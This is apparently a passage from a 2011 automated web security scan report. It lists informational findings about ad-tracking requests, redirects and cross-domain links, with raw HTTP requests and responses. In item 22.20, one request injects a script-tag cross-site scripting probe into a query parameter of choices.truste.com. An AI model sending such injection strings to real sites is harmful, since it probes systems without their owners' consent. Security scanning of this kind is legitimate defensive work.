Set-Cookie: adImpCount=z8H5DIFkJMaR8Ed5F-227NZjh3y-rcMW04k_wbW9O0UpagDPKKctVczI9DEFcEkP4SDJo80wBimsrZzphev9io1NrxolS3YNP6BCNWbNMKERTUDkfjOHZfLNt9GGTnw4O5DlS8Xp0DD0cZiQf18CU1rocxY7nE-F4z9lkwlZYJmyKyuZekSrBs8bFOGeiOzayOqtjqJUs1trCEbZqAdtWw; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
Set-Cookie: fc=VBzn51JQz0zltCfNSC7f2diNYkWtlxDZmnwtgj7m71awBKgjtjPFRrKyS70pSqF5M1teNC2VYwZFniwNP2T0Fr3wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
Set-Cookie: pf=_ueUnCc1-Qecqj3JV1mSQXt8U7koKOu226ju1sLmLj8NE6qDfV8NEBcnTK27A9VWCoQ27uEq-jG8qUjaqeGSQcTUowLuhfuR4YEKOy3c8ZHFvEIZFcaT9sTwHmEL6Z6P6fmPZnJfwJhzzO6E35ZJTCuxdvuaAUa6ZYmQOOWX4Ivvjejc8x_DoS2zqjDa34YxxYOzH-FsCNNOyyJfH-npNT1r1jk-eJ1M0AYv01y1P5pSsnil0SgAGJf16SQF0ZiST-FpBVOv8U8Yc4TghjCD5heht3ivBnz3hwow8XaUE6U; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:40:38 GMT
Content-Length: 11133

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
oncept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;

document.write('\n\n\n    \n\n     \n    \n        \n        \n    \n\n\n\n\n\n\n        \n        \n        \n                \n                \n            \n                \n                <IFRAME SRC="http://ad.doubleclick.net/adi/N5823.DbclkAdEx/B5478635.45;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W6WvwMAawABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/;" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5823.DbclkAdEx/B5478635.45;abr=!ie;sz=728x90;ord=7992084605561387239;AD_ID=26005388;BEHAVIOR_SIGNAL_ID=319697420;CHANNEL_ID=11185948;LINE_ITEM_ID=184588126;PUBLISHER_ID=11185880;SITE_ID=13906109?;click=http://r.turn.com/r/tpclick/id/57ha2ZqW6W6WvwMAawABAA/3c/http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBrsFWtn7QTcaOFpLWsAe-wuzACo200M4B9bmdvRTJkYikFwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05OTQyNTMwMzg1NDg1MDkwsgEZc2VjdXJlc2hvcHBpbmcubWNhZmVlLmNvbboBCTcyOHg5MF9hc8gBCdoBIWh0dHA6Ly9zZWN1cmVzaG9wcGluZy5tY2FmZWUuY29tL5gC1LsBwAIEyAK1nNURqAMB6ANO6AO7AugDmALoAxL1AwYAAASABqXS-q_P08q2hQE%26num%3D1%26sig%3DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...
DAGiWqtycjJBgtabbvXcUHzHk2Ua0lvcnqA%26client%3Dca-pub-9942530385485090%26adurl%3D/url/http://ad.doubleclick.net/jump/N5823.DbclkAdEx/B5478635.45;abr=!ie4;abr=!ie5;sz=728x90;ord=7992084605561387239?">\n<IMG SRC="http://ad.doubleclick.net/ad/N5823.DbclkAdEx/B5478635.45;abr=!ie4;abr=!ie5;sz=728x90;ord=7992084605561387239?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...

22.16. http://adadvisor.net/adscores/g.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/adscores/g.js

Issue detail

The page was loaded from a URL containing a query string:

http://adadvisor.net/adscores/g.js?sid=9201023828

The response contains the following links to other domains:

http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0
http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Request

GET /adscores/g.js?sid=9201023828 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:09 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 258
Content-Type: application/javascript

document.write('<img src="http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000" height="1" width="1" /><img height="1" width="1" src="http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0" />');

22.17. http://admeld.adnxs.com/usersync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://admeld.adnxs.com
Path:	/usersync

Issue detail

The page was loaded from a URL containing a query string:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

The response contains the following link to another domain:

http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:39 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:22:39 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:22:39 GMT
Content-Length: 155

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

22.18. http://bh.contextweb.com/bh/drts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/drts

Issue detail

The page was loaded from a URL containing a query string:

http://bh.contextweb.com/bh/drts?Rand=382861388

The response contains the following link to another domain:

http://tag.admeld.com/pixel?admeld_adprovider_id=8&_segment=2%7C8vciuQJMXXJY%7CAMQU1.12683

Request

GET /bh/drts?Rand=382861388 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw; 526735_4_81610=1305508795680; cr=355|1|-8588954932899850418|1; vf=1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Cache-Control: private, max-age=0, no-cache, no-store
Expires: -1
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 16 May 2011 01:25:58 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 164

<html>
   <body>
       <img src='http://tag.admeld.com/pixel?admeld_adprovider_id=8&_segment=2%7C8vciuQJMXXJY%7CAMQU1.12683' width='1' height='1'/>
   </body>
</html>

22.19. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://bp.specificclick.net/?pixid=99007235

The response contains the following link to another domain:

http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1

Request

GET /?pixid=99007235 HTTP/1.1
Host: bp.specificclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9459547300357.371?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=FiMiv7kDK4v9CD

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 225
Date: Mon, 16 May 2011 01:40:51 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://ad.doubleclick.net/activity;src=1846927;dcnet=4591;boom=28050;sz=1x1">here</a>
...[SNIP]...

22.20. http://choices.truste.com/ca previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The page was loaded from a URL containing a query string:

http://choices.truste.com/ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002&plc=tr

The response contains the following links to other domains:

http://bit.ly/fV69ra
http://bit.ly/hFy5ws

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1f4061%3Cscript%3Ealert(1)%3C/script%3Ed96264b56bd&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/5

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 21:18:54 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4471

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
<hr /> \
<a href="http://bit.ly/hFy5ws" target="_blank"><b>
...[SNIP]...
<hr />\
<a href="http://bit.ly/fV69ra" target="_blank"><b>
...[SNIP]...

22.21. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=xplusone1&_r=1

The response contains the following link to another domain:

http://d.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=CAESEO49KfNMA7ZNCWbrVI50sTw&cver=1&_r=1

Request

GET /pixel?nid=xplusone1&_r=1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d.xp1.ru4.com/meta?_o=179638&_t=cmcont&ssv_ptnr=pm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Found
Location: http://d.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=CAESEO49KfNMA7ZNCWbrVI50sTw&cver=1&_r=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 01:19:55 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 306
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://d.xp1.ru4.com/um?_r=1&_o=62795&_i=52786&_u=CAESEO49KfNMA7ZNCWbrVI50sTw&cver=1&_r=1">here</A>
...[SNIP]...

22.22. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0

The response contains the following links to other domains:

http://www.google.com/
http://www.google.com/support/bin/answer.py?answer=86640

Request

GET /pixel?nid=rfi&forward=http%3A%2F%2Fib.adnxs.com%2Fpxj%3Fbidder%3D18%26action%3Dsetuids%28%27615304299134845020%27%2C%27%27%29%3B%26redir%3Dhttp%253A%252F%252Fib.adnxs.com%252Fgetuidu%253Fhttp%253A%252F%252Fa.rfihub.com%252Fcm%253Fapxuid%253D%2524UID%2526forward%253Dhttp%25253A%25252F%25252Fib.adnxs.com%25252Fseg%25253Fadd%25253D79783%252526redir%25253Dhttp%2525253A%2525252F%2525252Fad.yieldmanager.com%2525252Fpixel%2525253Fid%2525253D1056936%25252526t%2525253D2%25252526piggyback%2525253Dhttp%252525253A%252525252F%252525252Fwww.googleadservices.com%252525252Fpagead%252525252Fconversion%252525252F1030878771%252525252F%252525253Flabel%252525253D8tkSCLfIiwIQs-zH6wM%2525252526amp%252525253Bguid%252525253DON%2525252526amp%252525253Bscript%252525253D0 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 403 Forbidden
Content-Length: 1207
Content-Type: text/html
Date: Mon, 16 May 2011 01:43:02 GMT
Server: GFE/2.0

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>Sorry...</title><style> body { font-family: verdana, arial, sans-serif; background-color: #fff; color: #000; }</s
...[SNIP]...
<div style="margin-left: 4em;">See <a href="http://www.google.com/support/bin/answer.py?answer=86640">Google Help</a>
...[SNIP]...
<div style="text-align: center; border-top: 1px solid #dfdfdf;">© 2009 Google - <a href="http://www.google.com">Google Home</a>
...[SNIP]...

22.23. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=turn1

The response contains the following link to another domain:

http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1

Request

GET /pixel?nid=turn1 HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Found
Location: http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 01:24:51 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 283
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://r.turn.com/r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1">here</A>
...[SNIP]...

22.24. http://cm.g.doubleclick.net/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.g.doubleclick.net
Path:	/pixel

Issue detail

The page was loaded from a URL containing a query string:

http://cm.g.doubleclick.net/pixel?nid=audsci

The response contains the following link to another domain:

http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1

Request

GET /pixel?nid=audsci HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 302 Found
Location: http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 01:20:17 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1">here</A>
...[SNIP]...

22.25. http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cplads.appspot.com
Path:	/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250

Issue detail

The page was loaded from a URL containing a query string:

http://cplads.appspot.com/ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250?click_url=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAXQ-x3vQTfj0O4T3lQe1yvVVq4_gsQLzwaClI8CNtwGw_cgCEAEYASCtp4YKOABgyYaFiYikhBCgAY2KlNEDsgEVd3d3Lm9ic2VydmVydG9kYXkuY29tugEKMzAweDI1MF9hc8gBCdoBfGh0dHA6Ly93d3cub2JzZXJ2ZXJ0b2RheS5jb20vcGFnZS9jb250ZW50LmRldGFpbC9pZC81NTkyODAvLVNwZWNpYWwtZGF5LS1mb3ItMS0wMDAtZ3JhZHVhdGVzLWF0LUZyZWRvbmlhLVN0YXRlLmh0bWw_bmF2PTUwNDfgAQS4AhjgAgDqAhRDTVN2Ml9NaWRkbGVfMzAweDI1MJADpAOYA-ADqAMB0QPYHYd97hHY_-gDmAPoA6Eq6AP0AugDSugDoCn1AwAAgMT1AyAAAADgBAE%26num%3D1%26sig%3DAGiWqtxz3ZPKcx8cEZzSG-jfrxoOb5gn3g%26client%3Dca-pub-0279219903859783%26adurl%3D&ad_group_id=2667017387

The response contains the following link to another domain:

http://www.inadcoads.com/script.ashx?pczid=c9a0e679-622f-4d8f-9f1d-aa7935b162b1

Request

GET /ad_tag/three_pas/everst3tags4222011appliedmanagementcontentonlinecollegesappliedmanagement300x250?click_url=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBAXQ-x3vQTfj0O4T3lQe1yvVVq4_gsQLzwaClI8CNtwGw_cgCEAEYASCtp4YKOABgyYaFiYikhBCgAY2KlNEDsgEVd3d3Lm9ic2VydmVydG9kYXkuY29tugEKMzAweDI1MF9hc8gBCdoBfGh0dHA6Ly93d3cub2JzZXJ2ZXJ0b2RheS5jb20vcGFnZS9jb250ZW50LmRldGFpbC9pZC81NTkyODAvLVNwZWNpYWwtZGF5LS1mb3ItMS0wMDAtZ3JhZHVhdGVzLWF0LUZyZWRvbmlhLVN0YXRlLmh0bWw_bmF2PTUwNDfgAQS4AhjgAgDqAhRDTVN2Ml9NaWRkbGVfMzAweDI1MJADpAOYA-ADqAMB0QPYHYd97hHY_-gDmAPoA6Eq6AP0AugDSugDoCn1AwAAgMT1AyAAAADgBAE%26num%3D1%26sig%3DAGiWqtxz3ZPKcx8cEZzSG-jfrxoOb5gn3g%26client%3Dca-pub-0279219903859783%26adurl%3D&ad_group_id=2667017387 HTTP/1.1
Host: cplads.appspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Mon, 16 May 2011 01:24:45 GMT
Server: Google Frontend
Content-Length: 125

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=c9a0e679-622f-4d8f-9f1d-aa7935b162b1"></script>

22.26. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The page was loaded from a URL containing a query string:

http://disneycruise.disney.go.com/reservations/customize?execution=e1s3

The response contains the following links to other domains:

http://aimg.disneystore.com/content/global/recalls/recall_lightupwatch_02092011.pdf
http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/img/favicon.ico
http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/_lib/header/default.js
http://dcl.wdpromedia.com/media/dcl_v0400/Site/Reservations/2.39.0.9/js/nonGlobal/searchResults/searchResults.js
http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css?files=/global/core.css,/global/buttons/buttons.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/main.css,/global/debug/debug.css,/global/error/error.css,/global/navigation/navigation.css,/global/categoryList/main.css,/nonGlobal/book/applyPayment.css,/nonGlobal/book/main.css,/nonGlobal/cruiseSearch/cruiseSearch.css,/nonGlobal/customizeCruise/main.css,/nonGlobal/customizeCruise/summary.css,/nonGlobal/searchResults/searchResults.css,/nonGlobal/taLogin/taLogin.css,/../js/dewey/2.5.1/build/yui/menu/assets/skins/sam/menu.css,/../js/dewey/2.5.1/build/yui/tabview/assets/skins/sam/tabview.css,/../js/dewey/2.5.1/build/yui/assets/skins/sam/skin.css,/global/main/sharedMain.css
http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/css?files=/modules/searchAutoComplete.css
http://dcl.wdpromedia.com/reservations/concat/2.39.0.9/js?files=/dewey/2.5.1/build/yui/selector/selector-beta-min.js,/dewey/2.5.1/build/yui/datasource/datasource-min.js,/dewey/2.5.1/build/yui/container/container-min.js,/dewey/2.5.1/build/yui/menu/menu-min.js,/dewey/2.5.1/build/yui/autocomplete/autocomplete-min.js,/dewey/2.5.1/build/yui/json/json-min.js,/dewey/2.5.1/build/yui/logger/logger-min.js,/dewey/2.5.1/build/yui/tabview/tabview-min.js,/dewey/2.5.1/build/yui/history/history-min.js,/dewey/2.5.1/build/yui/slider/slider-min.js,/global/stringUtils.js,/global/validators.js,/global/formUtils.js,/global/codeRegistry.js,/global/tools.js,/_lib/buttons/buttons.js,/_lib/analytics/analytics.js,/global/effects/effects.js,/global/async/errors.js,/global/async/pollingConnection.js,/global/async/ajaxRequest.js,/global/async/pleaseWait.js,/global/forms/abandonForms.js,/global/forms/formValidator.js,/global/forms/fieldValidations.js,/global/partyMixHandler.js,/global/animation/animation.js,/global/animation/sequencer.js,/global/categoryChangeHandler.js,/global/swfobject.js,/_lib/analytics/omniture/s_code.js,/_lib/tools/testAndTarget/mbox.js
